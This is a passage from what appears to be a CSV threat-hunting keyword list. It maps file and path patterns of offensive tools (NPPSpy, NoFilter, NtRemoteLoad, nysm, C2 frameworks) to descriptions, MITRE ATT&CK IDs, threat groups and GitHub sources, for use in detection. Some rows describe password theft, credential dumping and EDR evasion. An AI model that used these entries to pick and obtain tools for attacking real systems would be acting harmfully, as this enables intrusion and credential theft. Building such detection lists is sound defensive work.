CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/nmap_smb_scan_all_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/nmap-nse-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nmap-scada*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nmap-vulners*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nntp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Nofault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/NoFilter.cpp*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.git*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.sln*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.vcxproj*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/nopac.exe,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*/No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,1,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/No-PowerShell.exe*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,1,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*/nopowershell.git*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*/nopowershell/*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*/NoPowerShell/*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z
-*/noseyparker.git*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z
-*/NotQuite0DayFriday/zip/trunk*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z
-*/nowsecure/dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,1,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z
-*/nping-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/NPPSPY.dll*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*/NPPSpy.exe*,offensive_tool_keyword,NPPSpy,Simple code for NPLogonNotify(). The function obtains logon data including cleartext password,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy,1,1,N/A,10,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*/nps_payload.git*,offensive_tool_keyword,nps_payload,This script will generate payloads for basic intrusion detection avoidance,T1027 - T1027.005 - T1055 - T1211,TA0005 - TA0004,N/A,N/A,Exploitation tools,https://github.com/trustedsec/nps_payload,1,1,N/A,9,5,421,130,2017-08-08T14:12:48Z,2017-07-23T17:01:19Z
-*/nrpe-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/nse_install/*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*/nse-install.git*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z
-*/ntapphelpcachecontrol*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*/ntdissector.git*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,1,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z
-*/ntdissector/*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z
-*/ntdlll-unhooking-collection*,offensive_tool_keyword,ntdlll-unhooking-collection,unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless),T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/ntdlll-unhooking-collection,1,1,N/A,9,2,152,34,2023-08-02T02:26:33Z,2023-02-07T16:54:15Z
-*/NTDLLReflection.git*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,1,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*/NtdllUnpatcher.git*,offensive_tool_keyword,NtdllUnpatcher,code for EDR bypassing,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/Signal-Labs/NtdllUnpatcher,1,1,N/A,10,2,142,30,2019-03-07T11:10:40Z,2019-03-07T10:20:19Z
-*/ntds_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*/ntlm.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*/ntlmquic*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z
-*/NTLMRecon*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*/NTLMRecon.git*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*/ntlmrecon/*.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*/NTLMRelay2Self*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,1,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z
-*/ntlmrelayx/*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z
-*/ntlmrelayx/*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z
-*/ntlmscan.git*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z
-*/ntlmscan/*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z
-*/ntlmtransport.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z
-*/ntlmutil.py*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*/ntlmutil.py*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*/ntlmv1.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*/ntp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/ntp-monlist.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*/NtQuerySystemInformation.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z
-*/NtRemoteLoad.exe*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z
-*/NtRemoteLoad.git*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z
-*/NtRights/*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*/NtSetSystemInformation.md*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z
-*/Nuages_Cli*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*/nuagesAPI.js*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*/nxc --help*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z
-*/nysm bash*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*/nysm -dr socat TCP4-LISTEN*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*/nysm -r ssh *@*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*/nysm.bpf.c*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*/nysm.git*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation 
tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*/o365recon*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z
-*/oab-parse/mspack.*.dll*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z
-*/obfs3/obfs3.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*/obfuscated_scripts/*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
